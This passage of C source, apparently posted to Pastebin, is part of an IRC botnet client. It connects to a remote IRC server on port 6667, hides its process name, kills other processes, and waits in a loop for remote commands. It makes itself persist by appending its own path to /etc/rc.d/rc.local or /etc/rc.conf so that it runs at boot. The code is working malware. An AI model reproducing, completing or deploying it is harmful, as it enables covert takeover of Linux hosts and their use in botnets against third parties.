  768. struct Messages { char *cmd; void (* func)(int,char *,char *); } msgs[] = {
  769. { "352", _352 },
  770. { "376", _376 },
  771. { "433", _433 },
  772. { "422", _376 },
  773. { "PRIVMSG", _PRIVMSG },
  774. { "PING", _PING },
  775. { "NICK", _NICK },
  776. { (char *)0, (void (*)(int,char *,char *))0 } };
  777. void con() {
  778. struct sockaddr_in srv;
  779. unsigned long ipaddr,start;
  780. int flag;
  781. struct hostent *hp;
  782. start:
  783. sock=-1;
  784. flag=1;
  785. if (changeservers == 0) server=servers[rand()%numservers];
  786. changeservers=0;
  787. while ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0);
  788. if (inet_addr(server) == 0 || inet_addr(server) == -1) {
  789. if ((hp = gethostbyname(server)) == NULL) {
  790. server=NULL;
  791. close(sock);
  792. goto start;
  793. }
  794. bcopy((char*)hp->h_addr, (char*)&srv.sin_addr, hp->h_length);
  795. }
  796. else srv.sin_addr.s_addr=inet_addr(server);
  797. srv.sin_family = AF_INET;
  798. srv.sin_port = htons(6667);
  799. ioctl(sock,FIONBIO,&flag);
  800. start=time(NULL);
  801. while(time(NULL)-start < 10) {
  802. errno=0;
  803. if (connect(sock, (struct sockaddr *)&srv, sizeof(srv)) == 0 || errno == EISCONN) {
  804. setsockopt(sock,SOL_SOCKET,SO_LINGER,0,0);
  805. setsockopt(sock,SOL_SOCKET,SO_REUSEADDR,0,0);
  806. setsockopt(sock,SOL_SOCKET,SO_KEEPALIVE,0,0);
  807. return;
  808. }
  809. if (!(errno == EINPROGRESS ||errno == EALREADY)) break;
  810. sleep(1);
  811. }
  812. server=NULL;
  813. close(sock);
  814. goto start;
  815. }
  816. int main(int argc, char **argv) {
  817. int on,i;
  818. char cwd[256],*str;
  819. FILE *file;
  820. #ifdef STARTUP
  821. str="/etc/rc.d/rc.local";
  822. file=fopen(str,"r");
  823. if (file == NULL) {
  824. str="/etc/rc.conf";
  825. file=fopen(str,"r");
  826. }
  827. if (file != NULL) {
  828. char outfile[256], buf[1024];
  829. int i=strlen(argv[0]), d=0;
  830. getcwd(cwd,256);
  831. if (strcmp(cwd,"/")) {
  832. while(argv[0][i] != '/') i--;
  833. sprintf(outfile,"\"%s%s\"\n",cwd,argv[0]+i);
  834. while(!feof(file)) {
  835. fgets(buf,1024,file);
  836. if (!strcasecmp(buf,outfile)) d++;
  837. }
  838. if (d == 0) {
  839. FILE *out;
  840. fclose(file);
  841. out=fopen(str,"a");
  842. if (out != NULL) {
  843. fputs(outfile,out);
  844. fclose(out);
  845. }
  846. }
  847. else fclose(file);
  848. }
  849. else fclose(file);
  850. }
  851. #endif
  852. if (fork()) exit(0);
  853. #ifdef FAKENAME
  854. strncpy(argv[0],FAKENAME,strlen(argv[0]));
  855. for (on=1;on<argc;on++) memset(argv[on],0,strlen(argv[on]));
  856. #endif
  857. srand((time(NULL) ^ getpid()) + getppid());
  858. nick=makestring();
  859. ident=makestring();
  860. user=makestring();
  861. chan=CHAN;
  862. key=KEY;
  863. server=NULL;
  864. sa:
  865. #ifdef IDENT
  866. for (i=0;i<numpids;i++) {
  867. if (pids[i] != 0 && pids[i] != getpid()) {
  868. kill(pids[i],9);
  869. waitpid(pids[i],NULL,WNOHANG);
  870. }
  871. }
  872. pids=NULL;
  873. numpids=0;
  874. identd();
  875. #endif
  876. con();
  877. Send(sock,"NICK %s\nUSER %s localhost localhost :%s\n",nick,ident,user);
  878. while(1) {
  879. unsigned long i;
  880. fd_set n;
  881. struct timeval tv;
  882. FD_ZERO(&n);
  883. FD_SET(sock,&n);
  884. tv.tv_sec=60*20;
  885. tv.tv_usec=0;
  886. if (select(sock+1,&n,(fd_set*)0,(fd_set*)0,&tv) <= 0) goto sa;
  887. for (i=0;i<numpids;i++) if (waitpid(pids[i],NULL,WNOHANG) > 0) {
  888. unsigned int *newpids,on;
  889. for (on=i+1;on<numpids;on++) pids[on-1]=pids[on];
  890. pids[on-1]=0;
  891. numpids--;
  892. newpids=(unsigned int*)malloc((numpids+1)*sizeof(unsigned int));
  893. for (on=0;on<numpids;on++) newpids[on]=pids[on];
  894. free(pids);
  895. pids=newpids;
  896. }
  897. if (FD_ISSET(sock,&n)) {
  898. char buf[4096], *str;
  899. int i;
  900. if ((i=recv(sock,buf,4096,0)) <= 0) goto sa;
  901. buf[i]=0;
  902. str=strtok(buf,"\n");
  903. while(str && *str) {
  904. char name[1024], sender[1024];
  905. filter(str);
  906. if (*str == ':') {
  907. for (i=0;i<strlen(str) && str[i] != ' ';i++);
  908. str[i]=0;
  909. strcpy(sender,str+1);
  910. strcpy(str,str+i+1);
  911. }
  912. else strcpy(sender,"*");
  913. for (i=0;i<strlen(str) && str[i] != ' ';i++);
  914. str[i]=0;
  915. strcpy(name,str);
  916. strcpy(str,str+i+1);
  917. for (i=0;msgs[i].cmd != (char *)0;i++) if (!strcasecmp(msgs[i].cmd,name)) msgs[i].func(sock,sender,str);
  918. if (!strcasecmp(name,"ERROR")) goto sa;
  919. str=strtok((char*)NULL,"\n");
  920. }
  921. }
  922. }
  923. return 0;
  924. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!